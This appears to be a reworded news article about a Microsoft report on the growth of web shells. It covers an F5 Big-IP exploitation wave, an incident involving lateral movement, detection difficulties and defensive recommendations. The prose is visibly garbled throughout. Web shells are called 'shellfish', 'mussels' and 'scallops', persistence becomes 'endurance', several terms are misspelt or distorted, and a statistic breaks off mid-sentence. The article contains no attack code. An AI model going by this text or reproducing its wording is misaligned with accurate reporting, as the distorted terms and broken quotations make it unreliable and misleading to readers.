Microsoft security personnel are seeing a huge increase in the use of shellfish, the lightweight programs that hackers install so they can dig deeper into compromised sites.
The average number of net shells installed from August 2020 to January this year was 1
A Swiss Army knife for hackers
The growth is a sign of how useful and difficult it is to discover these simple programs can be. A web shell is an interface that allows hackers to execute standard commands on web servers once the servers have been compromised. Web shells are built using online programming languages such as PHP, JSP or ASP. The command interfaces work much like browsers do.
Once successfully installed, shellfish allow remote hackers to do most of the same things that legitimate administrators can do. Hackers can use them to execute commands that steal data, execute malicious code, and provide system information that allows them to move further into a compromised network. The programs can also provide a persistent means of backdoor access which, despite their effectiveness, remains surprisingly difficult to detect.
In a blog post published Thursday, members of Microsoft’s detection and response team and Microsoft 365 Defender Research Team wrote:
Once installed on a server, shellfish work as one of the most effective ways of endurance in a business. We often see cases where mussels are only used as an endurance mechanism. Mussels guarantee that a backdoor exists in a compromised network, because an attacker leaves a malicious implant after establishing a first foothold on a server. If they are not detected, shellfish provide attackers with a way to continue collecting data from and monetizing the networks they have access to.
Compromise recovery cannot be successful and sustained without finding and removing attackers’ endurance mechanisms. And while it is a good solution to rebuild a simple compromised system, the only possible option for many is to restore existing assets. So, finding and removing all backdoors is a critical aspect of compromise recovery.
In early July last year, the Metasploit hacking framework added a module that exploited a critical vulnerability in Big-IP Advanced Delivery Controls, a device created by F5 that is typically located between a perimeter firewall and a web application to handle load balancing and other tasks. A day later, Microsoft researchers began to see hackers using the exploit to install webshells on vulnerable servers.
Initially, hackers used the shell to install malicious software that exploited the servers’ computing power to extract cryptocurrency. Less than a week later, researchers saw hackers exploiting the Big IP vulnerability to install shellfish for a much wider range of applications on servers belonging to both the US government and the private industry.
In another case from last year, Microsoft said it was conducting an incident response after a public sector organization discovered that hackers had installed a web shell on one of its Internet-facing servers. The hackers had “uploaded a web shell in several folders on the web server, which led to the subsequent compromise between service accounts and domain administrator accounts,” Microsoft researchers wrote. “This allowed the attackers to perform reconnaissance using net.exe, scan for multiple target systems using nbtstat.exe, and finally move sideways using PsExec. ”
The hackers continued to install a backdoor on an Outlook server that intercepted all incoming and outgoing emails, performed further reconnaissance and downloaded other malicious payloads. Among other things, the hack allowed hackers to send special emails that the backdoor interpreted as commands.
Needle in a haystack
Because they use common language for web development, scallops can be difficult to detect. In addition to the difficulty, web shells have several ways to execute commands. Attackers can also hide commands inside user agent strings and parameters that are sent during an exchange between an attacker and the compromised site. As if that were not enough, mussels can be stashed inside media files or other non-executable file formats.
“When this file is loaded and analyzed on a workstation, the image is harmless,” Microsoft researchers wrote. “But when a browser asks a server for this file, malicious code executes the server side. These challenges in detecting mussels contribute to their growing popularity as an attack tool. “
Thursday’s post shows a number of steps administrators can take to prevent shellfish from entering a server. They include:
- Identify and correct vulnerabilities or misconfigurations in web applications and web servers. Use Threat and Sulnerability Management to detect and fix these vulnerabilities. Distribute the latest security updates as soon as they become available.
- Implement the correct segmentation of your perimeter network so that a compromised web server does not lead to compromise from the corporate network.
- Enable antivirus protection on web servers. Turn on cloud-delivered protection to get the ultimate defense against new and emerging threats. Users should only be able to upload files to directories that can be scanned by antivirus and configured not to allow scripts or server-side execution.
- Revise and review logs from web servers frequently. Be aware of all the systems you expose directly to the Internet.
- Use Windows Defender Firewall, Burglar Prevention Devices, and Network Firewall to prevent command-and-control server communication between endpoints whenever possible and restrict page movement as well as other attack activities.
- Check your firewall and proxy to restrict unnecessary access to services, including access to services through non-standard ports.
- Practice good identification. Restrict the use of accounts with local or domain admin rights.
The National Security Agency has published tools here that help administrators detect and remove shellfish on their networks.